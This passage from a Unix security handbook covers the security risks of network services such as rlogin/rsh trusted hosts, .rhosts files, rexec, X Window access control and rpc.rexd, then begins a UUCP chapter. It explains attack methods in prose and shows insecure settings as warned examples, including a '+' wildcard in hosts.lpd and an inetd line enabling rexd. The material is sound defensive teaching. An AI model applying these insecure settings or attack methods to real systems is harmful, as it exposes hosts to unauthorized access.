The Network News Transport Protocol (NNTP) is used by many large sites to transport Usenet articles between news servers. The<br />

protocol also allows users on distributed workstations to read news and post messages to the Usenet.<br />

NNTP can be configured with an access control list (ACL) to determine which computers are allowed to use which features. The<br />

access control list is based on hostname; thus NNTP's security can be bypassed through IP spoofing or through DNS attacks.<br />

Under normal circumstances, a compromised NNTP server does not represent a serious security threat - it simply means that an<br />

unauthorized individual may be able to read or post Usenet articles without permission. However, there are two potential<br />

circumstances in which unauthorized use of NNTP could cause problems:<br />

● If you have special newsgroups for your own organization's internal discussions, there is a chance that a compromised NNTP server could reveal confidential information to outsiders.
● If an outsider can post from your NNTP server, that outsider could post a message that is libelous, scandalous, or offensive - potentially causing a liability for your organization.

You can protect your NNTP server from these forms of abuse with a good firewall.<br />

INND is an alternative Usenet news transport program written by Rich Salz. If you are running INND, make sure that you have at<br />

least version 1.4 and have applied the relevant security patches, or have a version higher than 1.4. Versions of INND prior to and<br />

including version 1.4 had a serious problem.[17]<br />

[17] For any software like this that you install, you should check to be sure that you have the most current version.<br />

17.3.14 Network Time Protocol (NTP) (UDP Port 123)<br />

The Network Time Protocol (NTP) is the latest in a long series of protocols designed to let computers on a local or wide area<br />

network figure out the current time. NTP is a sophisticated protocol that can take into account network delay and the existence of<br />

different servers with different clocks. Nevertheless, NTP was not designed to resist attack, and several versions of ntpd, the NTP<br />

daemon, can be fooled into making significant and erroneous changes to the system's clock.<br />

A variety of problems can arise if an attacker can change your system clock:<br />

● The attacker can attempt a replay attack. For example, if your system uses Kerberos, old Kerberos tickets may work once again. If you use a time-based password system, old passwords may work.
● Your system log files will no longer accurately indicate the correct time at which events took place. If your attacker can move the system's clock far into the future, he or she might even be able to cause your system to erase all of its log files as the result of a weekly or monthly cleanup procedure.
● Batch jobs run from the cron daemon may not be executed if your system's clock jumps over the time specified in your crontab file or directory. This type of failure in your system's clock may have an impact on your security.

17.3.15 Simple Network Management Protocol (SNMP) (UDP Ports 161 and 162)<br />

The Simple Network Management Protocol (SNMP) is a protocol designed to allow the remote management of devices on your<br />

network. To be managed with SNMP, a device must be able to receive packets over a network.<br />

SNMP allows for two types of management messages:<br />

● Messages that monitor the current status of the network (for example, the current load of a communications link)
● Messages that change the status of network devices (for example, take a communications link up or down)

SNMP can be of great value to attackers. With carefully constructed SNMP messages, an attacker can learn the internal structure<br />

of your network, change your network configuration, and even shut down your operations. Although some SNMP systems include<br />

provisions for password-based security, others don't. SNMP version 2.0 was intended to include better security features, but as this<br />

book goes to press, the standards committee is unable to agree on the necessary features, so the prospects look bleak. Each site<br />

must therefore judge the value of each particular SNMP service and weigh that value against the risk.<br />


NOTE: If you use SNMP, you should be sure to change your SNMP "community" from "public" to some other<br />

value. When an SNMP monitoring program queries an SNMP agent for information, the monitoring program must<br />

provide the correct community or the agent does not return any information. By changing your SNMP community<br />

from the default (public) to some other value, you can limit the amount of information that an unknowledgeable<br />

attacker can learn about your network.<br />

17.3.16 NEXTSTEP Window Server (NSWS) (TCP Port 178)<br />

NEXTSTEP applications (don't laugh; there are still quite a few out there) use TCP connections on port 178 to communicate with<br />

the NEXTSTEP Display PostScript Window Server. An application that can connect to the Window Server has total control of the<br />

workstation on which that Window Server is running: as with X, the application can read the contents of the screen and send<br />

events to other applications. Furthermore, the application can use the Display PostScript Server to read or write any file on the<br />

workstation to which the logged-in user has access.<br />

Current versions of the NEXTSTEP Window Server have a simplistic approach to security. There is no authentication of incoming<br />

connections. The Window Server either accepts connections from remote machines or it doesn't. Whether or not connections are<br />

accepted is set by a check box in the NEXTSTEP Preference application. The preference is stored in the user's "defaults database,"<br />

which means that it can be toggled on by rogue applications without the user's knowledge.<br />

Accept remote connections at your own risk.<br />

If you place a computer running NEXTSTEP on the <strong>Internet</strong>, be sure that you place it behind a firewall, or be absolutely sure that<br />

you do not allow remote applications to connect to your Window Server.<br />

17.3.17 rexec (TCP Port 512)<br />

The remote execution daemon /usr/sbin/rexecd allows users to execute commands on other computers without having to log into<br />

them. The client opens up a connection and transmits a message that specifies the username, the password, and the name of the<br />

command to execute. As rexecd does not use the trusted host mechanism, commands can be issued from any host on the network. However,

because rexecd requires that the password be transmitted over the network, it is susceptible to the same password snooping as<br />

Telnet.<br />

Unlike login and telnet, rexecd provides different error messages for invalid usernames and invalid passwords. If the username<br />

that the client program provides is invalid, rexecd returns the error message "Login incorrect." If the username is correct and the<br />

password is wrong, however, rexecd returns the error message "Password incorrect."<br />

Because of this flaw, a cracker can use rexecd to probe your system for the names of valid accounts and then to target those<br />

accounts for password guessing attacks.<br />

If you do not expect to use this service, disable it in /etc/inetd.conf.<br />
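Disabling rexec is normally a matter of commenting out its entry (the service name is exec) in /etc/inetd.conf and then signaling inetd to reread its configuration, as described earlier. The path to rexecd below is an assumption and varies between systems:

#exec   stream  tcp     nowait  root    /usr/sbin/rexecd     rexecd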

17.3.18 rlogin and rsh (TCP Ports 513 and 514)<br />

The rlogin and rlogind programs provide remote terminal service that is similar to telnet. rlogin is the client program, and rlogind<br />

is the server. There are two important differences between rlogin and telnet:<br />

1. rlogind does not require that the user type his or her username; the username is automatically transmitted at the start of the connection.
2. If the connection is coming from a "trusted host" or "trusted user" (described in the next section), the receiving computer lets the user log in without typing a password.

rsh/rshd are similar to rlogin/rlogind, except that instead of logging the user in, they simply allow the user to run a single<br />

command on the remote system. rsh is the client program, while rshd is the server. rsh/rshd only works from trusted hosts or<br />

trusted users (described in the next section).<br />

rlogin is used both with local area networks and over the <strong>Internet</strong>. Unfortunately, it poses security problems in both environments.<br />

rlogin and rsh are designed for communication only between Berkeley <strong>UNIX</strong> systems. Users who want to communicate between<br />

<strong>UNIX</strong> and TOPS, VMS, or other kinds of systems should use the telnet protocol, not the rlogin protocol.<br />


17.3.18.1 Trusted hosts and users<br />

Trusted host is a term that was invented by the people who developed the Berkeley <strong>UNIX</strong> networking software. If one host trusts<br />

another host, then any user who has the same username on both hosts can log in from the trusted host to the other computer<br />

without typing a password.<br />

Trusted users are like trusted hosts, except they are users, not hosts. If you designate a user on another computer as a trusted user<br />

for your account, then that user can log into your account without typing a password.<br />

The <strong>UNIX</strong> system of trusted hosts allows you to use the network to its fullest extent. rlogin lets you easily jump from computer to<br />

computer, and rsh lets you run a command on a remote computer without even having to log in!<br />

Trust has a lot of advantages. In a small, closed environment, computers often trust each other. Trust allows a user to provide a<br />

password once, the first time he logs in, and then to use any other machine in the cluster without having to provide a password a<br />

second time. If one user sometimes uses the network to log into an account at another organization, then that user can set up the<br />

accounts to trust each other, thus speeding up the process of jumping between the two organizations.<br />

But trust is also dangerous, because there are numerous ways that it can be compromised.<br />

NOTE: The trusted-host mechanism uses IP addresses for authentication and is thus vulnerable to IP spoofing (as<br />

well as to DNS attacks). Do not use trusted hosts in security-critical environments.<br />

17.3.18.2 The problem with trusted hosts<br />

Because you don't need to type your password when you use rlogin to log into a computer from another machine that is a trusted<br />

host, rlogin is usually less susceptible to eavesdropping than telnet. However, trusted hosts introduce security problems for two<br />

reasons: you can't always trust a host, and you can't trust the users on that host.<br />

If an attacker manages to break into the account of someone who has an account on two computers - and the two computers trust<br />

each other - then the person's account on the second computer is also compromised. Having an attacker break into the first<br />

computer is easier than it may sound. Most workstations can be booted in single-user mode with relative ease. As the superuser,<br />

the attacker can su to any account at all. If the server trusts the workstation - perhaps to let users execute commands on the server<br />

with rsh - then the attacker can use rlogin to log into the server and thereby gain access to anybody's files.<br />

Although some workstations can be password protected against being booted in single-user mode, this protection gives only an<br />

illusion of security. In theory, an attacker could simply unplug the current workstation and plug in her own. Portable <strong>UNIX</strong><br />

workstations with Ethernet boards are available that weigh less than four pounds. By reconfiguring her portable workstation's<br />

network address and hostname, she could program it to masquerade as any other computer on the local area network.<br />

Another problem with trusted hosts involves NFS. Often, a user's home directory is exported with NFS to other machines.<br />

Someone who is able to write to the user's home directory on that partition on a remote machine can add arbitrary entries to the<br />

.rhosts file. These additions then allow the attacker to log in to that account on every machine that imports the home directory.<br />

Trusted hosts and trusted users have been responsible for many security breaches in recent years. Trust causes breaches in security<br />

to propagate quickly: If charon trusts ringworld and an intruder breaks into ringworld, then charon is also compromised.<br />

Nevertheless, system administrators frequently set up computers as trusted clusters to enable users to take advantage of the<br />

network environment with greater ease. Although there is technically no reason to create these trusted clusters in a networked<br />

computing environment, at many computing facilities administrators believe that the benefits outweigh the risks.<br />

Trusted hosts are also vulnerable to IP spoofing, a technique in which one computer sends out IP packets that appear to come from<br />

a different computer. Using a form of IP spoofing, users on one host can masquerade, and appear to come from a second host.<br />

They can then log into your computer, if the second host is trusted.<br />

17.3.18.3 Setting up trusted hosts<br />

The /etc/hosts.equiv file contains a list of trusted hosts for your computer. Each line of the file lists a different host. If you have<br />

Sun's NIS (or use another system that supports netgroups), you can also extend or remove trust from entire groups of machines.<br />

Any hostname listed in hosts.equiv is considered trusted; a user who connects with rlogin or rsh from that host will be allowed to<br />

log in or execute a command from a local account with the same username, without typing a password. When using Sun's NIS<br />

(described in Chapter 19), a line of the form +@hostgroup makes all of the hosts in the network group hostgroup trusted;<br />


likewise, a line that has the form -@anotherhostgroup makes all of the hosts in the network group anotherhostgroup specifically<br />

not trusted. The file is scanned from the beginning to the end; the scanning stops after the first match.[18]<br />

[18] Beware that +@hostgroup and -@hostgroup features are broken in some NIS implementations. Check to be sure<br />

they are doing what you intend.<br />

Consider this example file:<br />

gold.acs.com<br />

silver.acs.com<br />

platinum.acs.com<br />

-@metals<br />

+@gasses<br />

This file makes your computer trust the computers gold, silver, and platinum in the acs.com domain. Furthermore, your computer<br />

will trust all of the machines in the gasses netgroup, except for the hosts that are also in the metals netgroup.<br />

17.3.18.4 The ~/.rhosts file<br />

After scanning the hosts.equiv file, the rlogind and rshd programs scan the user's home directory for a file called .rhosts. A user's<br />

.rhosts file allows each user to build a set of trusted hosts applicable only to that user.<br />

For example, suppose the ~keith/.rhosts file on the math.harvard.edu computer contains the lines:<br />

prose.cambridge.ma.us<br />

garp.mit.edu<br />

With this .rhosts file, a user named keith on prose or on garp can rlogin into keith's account on math without typing a password.

A user's .rhosts file can also contain hostname-username pairs extending trust to other usernames. For example, suppose that<br />

keith's .rhosts file also contains the line:<br />

hydra.gatech.edu lenny<br />

In this case, the user named lenny at the host hydra could log into keith's account without providing a password.<br />

NOTE: Only place machine names in the /etc/hosts.equiv file; do not place machine/username pairs! Although many

versions of <strong>UNIX</strong> allow you to add usernames to the file, the <strong>UNIX</strong> networking utilities do not do the sensible thing<br />

by extending trust only to that particular user on that particular machine. Instead, they allow that particular user on<br />

that particular machine to log into any account on your system! If you wish to extend trust to a particular user on a<br />

particular machine, have that user create a ~/.rhosts file, described below.<br />

.rhosts files are powerful and dangerous. If a person works at two organizations, using a .rhosts file allows that person to use the<br />

rsh command between the two machines. It also lets you make your account available to your friends without telling them your<br />

password. (We don't recommend this as sound policy, however!) Also, note that the superusers of each organization can make use<br />

of the entries in .rhosts files to gain access to your account in the other organization. This could lead to big problems in some<br />

situations.<br />

The trust implied by the ~/.rhosts file is transitive. If you trust somebody, then you trust everybody that they trust, and so on.<br />

.rhosts files are easily exploited for unintended purposes. For example, crackers who break into computer systems frequently add<br />

their usernames to unsuspecting users' .rhosts files so that they can more easily break into the systems again in the future. For this<br />

reason, you may not want to allow these files on your computer.<br />

NOTE: The ~/.rhosts file should be set up with mode 600 so that other users on your system cannot easily determine<br />

the hosts that you trust. Always use fully qualified domain names in this file, and do not include any comment<br />

characters. (# or ! can create vulnerabilities.) The same restrictions apply to hosts.equiv and hosts.lpd.<br />

17.3.18.5 Searching for .rhosts files<br />

Because of the obvious risks posed by .rhosts files, many system administrators have chosen to disallow them entirely. How do

you do this? One approach is to remove (or comment out) the entries for rshd and rlogind in the inetd.conf file, thus disabling the<br />

commands that might use the files. Another way is to use Wietse Venema's logdaemon package. A third option is to obtain the<br />

source code for the rshd and rlogind programs and remove the feature directly.[19] This method is relatively easy to do. Another<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (21 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

approach is to scan your system periodically for users who have these files and to take appropriate action when you find them.<br />

Finally, you can patch the binary of your rshd and rlogind programs, search for the string /.rhosts, and then change it to the empty<br />

string.<br />

[19] Before you hack the code, try checking your rshd documentation. Some vendors have a flag to limit .rhosts (usually to just the supervisor).

You can find all of the .rhosts files on your system using a simple shell script:

#!/bin/ksh
# Search for .rhosts files in home directories
PATH=/usr/bin

for user in $(cat-passwd | awk -F: 'length($6) > 0 {print $6}' | sort -u)
do
    [[ -f $user/.rhosts ]] && print "There is a .rhosts file in $user"
done

where the cat-passwd command is the same one we described earlier.
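If you would rather not depend on that helper, a rough alternative is to walk the likely home-directory trees directly with find. This is only a sketch: the directories /home and /u are assumptions, so substitute wherever your site actually keeps home directories.

#!/bin/ksh
# Sketch: look for .rhosts files under the usual home-directory trees.
# /home and /u are placeholders; adjust the list for your site.
PATH=/usr/bin

for tree in /home /u
do
    [[ -d $tree ]] && find $tree -name .rhosts -print
done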

To delete the .rhosts files automatically, add a rm command to the shell script after the print:

#!/bin/ksh
# Search for .rhosts files in home directories
PATH=/usr/bin

for user in $(cat-passwd | awk -F: 'length($6) > 0 {print $6}' | sort -u)
do
    [[ -f $user/.rhosts ]] || continue
    rm -f $user/.rhosts
    print "$user/.rhosts has been deleted"
done
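If you want the scan to run automatically, you can invoke the script from cron. The crontab line below is only a sketch: the 2:00 a.m. schedule is arbitrary, and /usr/local/adm/check-rhosts is a placeholder for wherever you install the script.

0 2 * * * /usr/local/adm/check-rhosts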

NOTE: Many older SunOS systems were distributed with a single line containing only a plus sign (+) as their hosts.equiv file. The plus sign has the effect of making every host a trusted host, which is precisely the wrong thing to do. This line is a major security hole, because hosts outside the local organization (over which the system administrator has no control) should never be trusted. If you have a plus sign in your hosts.equiv file, REMOVE IT. This change will disable some other features, such as the ability for other machines to print on your printer using the remote printer system. To retain remote printing, follow the steps detailed later.

17.3.18.6 /etc/hosts.lpd file<br />

Normally, the <strong>UNIX</strong> lpd system allows only trusted hosts to print on your local printer. However, this restriction presents a<br />

security problem, because you may wish to let some computers use your printer without making them equivalent hosts.<br />

The way out of this quandary is to amend the /etc/hosts.lpd file. By placing a hostname in this file, you let that host use your<br />

printers without making it an equivalent host. For example, if you want to let the machines dearth and black use your computer's<br />

printer, you can insert their names in /etc/hosts.lpd:<br />

% cat /etc/hosts.lpd<br />

dearth<br />

black<br />

%<br />

The hosts.lpd file has the same format as the hosts.equiv file. Thus, to allow any computer on the <strong>Internet</strong> to print on your printer,<br />

you could use the following entry:<br />

% cat /etc/hosts.lpd<br />

+<br />

%<br />


We do not recommend that you do this, however!<br />

17.3.19 Routing <strong>Internet</strong> Protocol (RIP routed) (UDP Port 520)<br />

The RIP routing protocol is used by <strong>Internet</strong> gateways to exchange information about new networks and gateways. It is<br />

implemented on many <strong>UNIX</strong> systems by the routed daemon. An alternative daemon called gated offers more control over which<br />

routing information is accepted and distributed.<br />

The routed daemon is quite a trusting program: it will happily receive (and believe) a packet from another computer on the network that says, in effect, "I am the best gateway to get anywhere; send all of your packets to me." Clearly, this trust presents even inexperienced attackers with a simple way to confound your network. Even worse: it gives sophisticated attackers a way to eavesdrop on all of your communications.

For these reasons, many sites no longer run the routed daemon. Instead, they use static routes. For most network configurations, static routing is all that is really needed: if there is only one gateway out of the local network, all traffic should be routed to it.
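On many systems, you can install such a static default route with the route command, typically from a boot-time script. The line below is only a sketch: the gateway address 192.168.1.1 is a placeholder, and the exact arguments (including whether a metric is required) vary from vendor to vendor, so check your route manual page.

route add default 192.168.1.1 1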

17.3.20 UUCP over TCP (TCP Port 540)<br />

The main use for sending UUCP data over TCP connections is that some UUCP systems can transmit Usenet news more<br />

efficiently than the more modern NNTP.<br />

UUCP over TCP presents a security risk, as UUCP passwords are sent unencrypted. Furthermore, if you use news to transfer<br />

confidential information between corporate sites, that information may be monitored by other sites situated between the two<br />

endpoints.<br />

17.3.21 The X Window System (TCP Ports 6000-6063)<br />

X is a popular network-based window system that allows many programs to share a single graphical display. X-based programs<br />

display their output in windows, which can be either on the same computer on which the program is running or on any other<br />

computer on the network.<br />

Each graphical device that runs X is controlled by a special program, called the X Window Server. Other programs, called X<br />

clients, connect to the X Window Server over the network and tell it what to display. Two popular X clients are xterm (the X<br />

terminal emulator) and xclock (which displays an analog or digital clock on the screen).<br />

17.3.21.1 /etc/fbtab and /etc/logindevperm<br />

Multiuser workstations provide a challenge for X security. On early implementations of X, the logical devices for the keyboard,<br />

screen, and sound devices were world readable and world writable; this availability caused security problems, because it meant<br />

that anybody could read the contents of the user's screen or keyboard, or could listen to the microphone in his office.<br />

Some versions of <strong>UNIX</strong> have a special file that is used to solve this problem. The file, which is called /etc/fbtab under SunOS and<br />

/etc/logindevperm under Solaris (for example), specifies a list of devices that should have their owner changed to the account that<br />

has logged into the <strong>UNIX</strong> workstation. This approach is similar to the way that the /bin/login changes the ownership of tty devices<br />

to the person who has logged into a serial device.<br />

Here is a portion of the Solaris /etc/logindevperm file. Under Solaris, the file is read by the /bin/ttymon program. When a person<br />

logs onto the device that is listed in the first field, the program sets the device listed in the third field to the UID of the user that<br />

has logged in. The mode of the device is set to the value contained in the second field:<br />

/dev/console 0600 /dev/mouse:/dev/kbd<br />

/dev/console 0600 /dev/sound/* # audio devices<br />

/dev/console 0600 /dev/fbs/* # frame buffers<br />

/dev/console 0600 /dev/rtvc0 # nachos capture device 0<br />

/dev/console 0400 /dev/rtvcctl0 # nachos control device 0<br />

17.3.21.2 X security<br />

The X Window System has a simple security model - all or nothing. The X security mechanisms are used to determine whether or not a client can connect to the X Window Server. After a client successfully connects, that client can exercise complete control over the display.

X clients can take over the mouse or the keyboard, send keystrokes to other applications, or even kill the windows associated with<br />

other clients. This capability allows considerable flexibility in the creation of new clients. Unfortunately, it also creates a rich<br />

opportunity for Trojan horse programs: the multi-user tank war game that you are running in a corner of your screen may actually<br />

be covertly monitoring all of the email messages that you type on your keyboard, or may be making a copy of every password that<br />

you type.<br />

The simplest way for an X client program to monitor your keystrokes is to overlay the entire screen with a transparent, invisible<br />

window. Such a program records keystrokes, saves them for later use, and forwards the event to the appropriate subwindows so<br />

that the user can't tell that he or she is being monitored. Releases of the X Window System later than X11R4 have a "secure"<br />

feature on the xterm command that grabs the input from the keyboard and mouse in such a way that no transparent overlay can<br />

intercept the input. The xterm window changes color to show that this is in effect. The option is usually on a pop-up menu that is<br />

selected by holding down both the control key and the left mouse button. This is a partial fix, but it is not complete.<br />

Rather than develop a system that uses access control lists and multiple levels of privilege, the designers of the X Window System<br />

have merely worked to refine the all-or-nothing access control. X Version 11, Release 6 has five different mechanisms for<br />

implementing access control. They are listed in Table 17.3.<br />

17.3.21.3 The xhost facility<br />

X maintains a host access control list of all hosts that are allowed to access the X server. The host list is maintained via the xhost<br />

command. The host list is always active, no matter what other forms of authentication are used. Thus, you should fully understand<br />

the xhost facility and the potential problems that it can create.<br />

The xhost command lets users view and change the current list of "xhosted" hosts. Typing xhost by itself displays a list of the<br />

current hosts that may connect to your X Window Server.<br />

% xhost<br />

prose.cambridge.ma.us<br />

next.cambridge.ma.us<br />

%<br />

Table 17.3: X Access Control Systems

xhost
    Technique: User specifies the hosts from which client connections are allowed; all others are rejected.
    Advantages: Simple to use and understand.
    Disadvantages: Not suited to environments in which workstations or servers are used by more than one person at a time. Server is susceptible to IP spoofing.

MIT-MAGIC-COOKIE-1
    Technique: Xdm or user creates a 128-bit "cookie" that is stored in the user's .Xauthority file at login. Each client program reads the cookie from the .Xauthority file and passes it to the server when the connection is established.
    Advantages: Access to the user's display is limited to processes that have access to the user's .Xauthority file.
    Disadvantages: Cookies are transmitted over the network without encryption, allowing them to be intercepted. Cookies are stored in the user's .Xauthority file, making it a target.

XDM-AUTHORIZATION-1
    Technique: Xdm creates a 56-bit DES key and a 64-bit random "authenticator" that are stored in the user's .Xauthority file. Each client uses the DES key to encrypt a 192-bit packet that is sent to the X server to validate the connection.
    Advantages: X authenticator is not susceptible to network eavesdropping.
    Disadvantages: The authenticator is stored in the .Xauthority file, making it a target. If the user's home directory is mounted using NFS or another network filesystem, the 56-bit DES key can be eavesdropped from the network when it is read by the X client program. This authorization system uses strong encryption and is therefore not exportable.

SUN-DES-1
    Technique: Authentication based on Sun's Secure RPC. Uses the xhost command as its interface.
    Advantages: Communication to the X server is encrypted with the X server's public key; the secret key is not stored in the .Xauthority file, removing it as a target.
    Disadvantages: Only runs on systems that have Sun Microsystems' Secure RPC (mostly Solaris). This authorization system uses strong encryption and is therefore not exportable.

MIT-KERBEROS-5
    Technique: Xdm obtains Kerberos tickets when the user logs in; these tickets are stored in a special credentials cache file that is pointed to by the KRB5CCNAME environment variable.
    Advantages: Extends the Kerberos network-based authentication system to the X Window System.
    Disadvantages: Credentials file is a target. Stolen tickets can be used after the user logs out. Kerberos can be a challenge to install.

You can add a host to the xhost list by supplying a plus sign, followed by the host's name on the command line after the xhost<br />

command. You can remove a host from the xhost list by supplying its name preceded by a hyphen:<br />

% xhost +idr.cambridge.ma.us<br />

idr.cambridge.ma.us being added to access control list<br />

% xhost<br />

next.cambridge.ma.us<br />

prose.cambridge.ma.us<br />

idr.cambridge.ma.us<br />

% xhost -next.cambridge.ma.us<br />

next.cambridge.ma.us being removed from access control list<br />

% xhost<br />

prose.cambridge.ma.us<br />

idr.cambridge.ma.us<br />

If you xhost a computer, any user on that computer can connect to your X Server and issue commands. If a client connects to your<br />

X Window Server, removing that host from your xhost list will not terminate the connection. The change will simply prevent<br />

future access from that host.<br />

If you are using SUN-DES-1 authentication, you can use the xhost command to specify the network principals (users) who are<br />

allowed to connect to your X server. The xhost command distinguishes principals from usernames because principals contain an at<br />

sign (@). For example, to allow the network principal debby@oreilly to access your server, you could type:<br />

prose% xhost debby@oreilly<br />

If you are using MIT-KERBEROS-5 authentication, you can use the xhost command to specify the Kerberos users who are<br />

allowed to connect to your server. Kerberos usernames must be preceded by the string krb5:. For example, if you wished to allow<br />

the Kerberos user alice to access your server, you would use the command:<br />

prose% xhost krb5:alice<br />

The file /etc/X0.hosts contains a default list of xhost hosts for X display 0. This file contains a list of lines that determine the<br />

default host access to the X display. The format is the same as the xhost command: if a hostname appears by itself or is preceded<br />

by a plus sign, that host is allowed. If a hostname appears preceded by a minus sign, that host is denied. If a plus sign appears on a<br />

line by itself, access control is disabled.<br />


For example, this file allows default access to X display 0 for the hosts oreo and nutterbutter:<br />

% cat /etc/X0.hosts<br />

-<br />

+oreo<br />

+nutterbutter<br />

If you have more than one display, you can create files /etc/X1.hosts, /etc/X2.hosts, and so forth.<br />

17.3.21.4 Using Xauthority magic cookies<br />

Normally, the Xauthority facility is automatically invoked when you use the xdm terminal management system. However, you can<br />

also enable it manually if you start the X server yourself.<br />

To start, you should preload your .Xauthority file with an appropriate key for your display. If you have the Kerberos or Sun <strong>Sec</strong>ure<br />

RPC mechanisms available, you should use those. Otherwise, you need to create a "magic cookie" for your current session. This<br />

cookie should be a random value that is not predictable to an attacker. (The script given in "A Good Random Seed Generator" in<br />

Chapter 23, Writing <strong>Sec</strong>ure SUID and Network Programs can be used for this.) You should generate your "cookie" and store it in<br />

your .Xauthority file (normally, $HOME/.Xauthority):<br />

$ typeset -RZ28 key=$(randbits -n 14)
$ export XAUTHORITY=${XAUTHORITY:=$HOME/.Xauthority}
$ umask 077
$ rm -f $XAUTHORITY
$ cp /dev/null $XAUTHORITY
$ chmod 600 $XAUTHORITY
$ xauth add $HOSTNAME:$displ . $key
$ xauth add $HOSTNAME/unix:$displ . $key
$ xauth add localhost:$displ . $key
$ unset key

Next, when you start your X server, do so with the -auth option:<br />

$ xinit -- -auth $XAUTHORITY<br />

All your local client programs will now consult the .Xauthority file to identify the correct "magic cookie" and then send it to the<br />

server. If you want to run a program from another machine to display on this one, you will need to export the "cookies" to the<br />

other machine. If your home directory is exported with NFS, the file should already be available - you simply need to set the<br />

XAUTHORITY environment variable to the pathname of the .Xauthority file (or whatever else you've named it).<br />

Otherwise, you can do something similar to:<br />

$ xauth extract - $DISPLAY | rsh otherhost xauth merge -<br />

Keep in mind that the "magic cookies" in this scheme can be read from your account or found by anyone reading network packets.<br />

However, this method is considerably safer than using the xhosts mechanism, and should be used in preference to xhosts when<br />

feasible.<br />

NOTE: Versions of X11R6 xdm prior to public patch 13 contain a weakness in the xauth generation method, which<br />

allows an intruder to access its display. For details, see "CERT advisory VB-95:08.X_Authentication_Vul."<br />

17.3.21.5 Denial of service attacks under X<br />

Even if you use the xhost facility, your X Window System may be vulnerable to attack from computers that are not in your xhost<br />

list. Some X window servers read a small packet from the client before they determine whether or not the client is in the xhost list.<br />

If a client connects to the X server but does not transmit this initial packet, the X server halts all operation until it times out in 30<br />

seconds.<br />

You can determine whether your X server has this problem by executing the following command:<br />

prose% telnet localhost 6000<br />

Here, 6000 is the TCP/IP port address of the first X server on the system. (The second X display on the system has a TCP/IP address of 6001.)

If your X server has this problem, your workstation's display will freeze. The cursor will not move, and you will be unable to type<br />

anything. In some X implementations, the X server will time out after 30 seconds and resume normal operations. Under other X<br />

implementations, the server will remain blocked until the connection is aborted.<br />

Although this attack cannot be used to destroy information, it can be used to incapacitate any workstation that runs one of these<br />

servers and is connected to the network. If you have this problem with your software, ask your vendor for a corrected update.<br />

17.3.22 RPC rpc.rexd (TCP Port 512)<br />

rpc.rexd is a Sun RPC server that allows remote program execution. Using rpc.rexd, any user who can execute RPC commands on your machine can run arbitrary shell commands.

The rpc.rexd daemon is usually started from the /etc/inetd.conf file with the following line:<br />

# We are being stupid and running the rexd server without <strong>Sec</strong>ure RPC:<br />

#<br />

rexd/1 tli rpc/tcp wait root /usr/sbin/rpc.rexd rpc.rexd<br />

As the comment indicates, you should not run the rexd server. We make this warning because running rexd without secure RPC<br />

basically leaves your computer wide open, which is why Sun distributes their /etc/inetd.conf file with rexd commented out:<br />

# The rexd server provides only minimal<br />

# authentication and is often not run<br />

#<br />

#rexd/1 tli rpc/tcp wait root /usr/sbin/rpc.rexd rpc.rexd<br />

We think that vendors should remove the rexd line from the /etc/inetd.conf file altogether.<br />
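Whether or not your vendor has done so, you can check whether rexd is currently registered with the portmapper on a given host. This is a sketch only: rpcinfo -p lists the RPC programs registered on the named host, and the service name in the output may appear as rex or rexd depending on the system.

% rpcinfo -p localhost | grep rex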

17.3.23 Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

Multi-User Dungeons (MUDS) are role-playing games that allow many people over a network to interact in the same virtual<br />

environment. Most MUDS are recreational, although some MUDS have been created to allow scientists and other professionals to<br />

interact. (The MIT Media Lab's MediaMOO is an example of such a virtual environment.)<br />

<strong>Internet</strong> Relay Chat (IRC) is the Citizen's Band radio of the <strong>Internet</strong>. IRC permits real-time communication between many<br />

different people on different computers. Messages can be automatically forwarded from system to system.<br />

While both MUDS and IRC can be useful and entertaining to use, these systems can also have profound security implications:

● Because these systems permit unrestricted communication between people on your computer and others on the Internet, they create an excellent opportunity for social engineering. Often an attacker will tell a naive user that there is some "great new feature" that they can enable simply by typing a certain command - a command that then allows the attacker to log in and take over the user's account. Unfortunately, there is no simple way to protect users from this kind of attack, other than to educate them to be suspicious of what they are told by strangers on the net.

● Most MUDS require users to create an account with a username and a password. Unfortunately, many users will blindly type the same username and password that they use for their UNIX account. This creates a profound security risk, as it permits anybody who has access to the MUD server (such as its administrator) to break into the user's UNIX account.

● Although many MUDS and IRCS can be used with Telnet, they are more fun when used with specially written client programs. Unfortunately, some of these programs have been distributed with intentional security holes and back doors. Determining whether or not a client program is equipped with this kind of "feature" is very difficult.

● Even if your MUD or IRC client doesn't have a built-in back door, many of these clients will execute commands from remote machines if such a feature is enabled by the user. The world of MUDS and IRCS is rife with malicious users who attempt to get unsuspecting users to enable these features.

● The server programs for MUDS and IRCS can place a significant load on the computers on which they reside. Unfortunately, as MUDS and IRCS do not use "trusted ports," users can run their own servers even if they don't have root access (see the sketch below for one way to spot such servers).
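One rough way to notice user-run servers of this kind is to review the listening TCP ports on your machines from time to time. This is only a sketch: netstat output formats differ between BSD- and System V-derived systems, so the pattern you search for may need adjusting.

% netstat -a | grep LISTEN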


Chapter 15
15. UUCP

Contents:
About UUCP
Versions of UUCP
UUCP and Security
Security in Version 2 UUCP
Security in BNU UUCP
Additional Security Concerns
Early Security Problems with UUCP
UUCP Over Networks
Summary

UUCP is the UNIX-to-UNIX Copy system, a collection of programs that have provided rudimentary networking for UNIX computers since 1977.

UUCP has three main uses:

● Sending mail and news to users on remote systems
● Transferring files between UNIX systems
● Executing commands on remote systems

Until recently, UUCP was very popular in the UNIX world for a number of reasons:

● UUCP came with almost every version of UNIX; indeed, for many users, UUCP used to be the reason to purchase a UNIX computer in the first place.

● UUCP required no special hardware: it runs over standard RS-232 serial cables, and over standard modems for long-distance networks.

● UUCP can store messages during the day and send them in a single batch at night, substantially lowering the cost of phone-based networking.

The UUCP programs also allow you to connect your computer to a worldwide network of computer systems called<br />

Usenet. Usenet is a multihost electronic bulletin board with several thousand special interest groups; articles posted<br />

on one computer are automatically forwarded to all of the other computers on the network. The Usenet reaches<br />

millions of users on computer systems around the world on every continent.<br />

In recent years, interest in UUCP has declined for a number of reasons:

● UUCP was designed and optimized for low-speed connections. When used with modems capable of transmitting at 14.4 Kbps or a faster rate, the protocols become increasingly inefficient.

● New network protocols such as SLIP and PPP use the same hardware as UUCP, yet allow the connecting machine to have access to the full range of Internet services.

● UUCP links that were used to provide access for one or a few people are being replaced with dial-up POP (Post Office Protocol) and IMAP servers, which allow much more flexibility when retrieving electronic mail over a slow connection and which are easier to administer.

